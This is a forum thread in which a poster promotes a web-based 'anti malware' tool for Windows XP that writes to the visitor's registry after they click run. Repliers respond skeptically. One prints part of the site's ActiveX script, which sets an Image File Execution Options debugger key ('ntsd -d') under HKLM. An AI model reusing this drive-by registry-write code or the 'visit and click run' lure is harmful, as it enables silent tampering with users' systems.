Hacxx Anti Malware for Windows XP

  • Thread starter Thread starter Hacxx
  • Start date Start date
H

Hacxx

Hi,

I'm launching a tool for Windows XP that blocks known malware. To use
it what you have to do is visit http://antimalware.x10.bz and click
run. The site will automaticaly send to your registry filenames of
known virus/worms etc. This task is only required once and if you have
filenames of virus and worms submit them to me in order for me to add
to the database.
 
From: "Hacxx" <[email protected]>

| Hi,

| I'm launching a tool for Windows XP that blocks known malware. To use
| it what you have to do is visit http://antimalware.shit.bz and click
| run. The site will automaticaly send to your registry filenames of
| known virus/worms etc. This task is only required once and if you have
| filenames of virus and worms submit them to me in order for me to add
| to the database.

Yeah right... "HEUR/HTML.Malware"

function HAM(){

var url = "http://hacxx.com"

var option = "ntsd -d";

var fso = new ActiveXObject("Scripting.FileSystemObject");

var Shell = new ActiveXObject("WScript.Shell");

Shell.RegWrite("HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Image File
Execution Options\\loaderadv493.exe\\Debugger",option,"REG_SZ");
 
Hacxx said:
Hi,

I'm launching a tool for Windows XP that blocks known
malware. To use it what you have to do is visit [http:...]
and click run. The site will automaticaly send to your
registry filenames of known virus/worms etc. This task
is only required once and if you have filenames of virus
and worms submit them to me in order for me to add
to the database.

It wouldn't work - filenames are mostly irrelevant.

What are you *really* up to?
 
Back
Top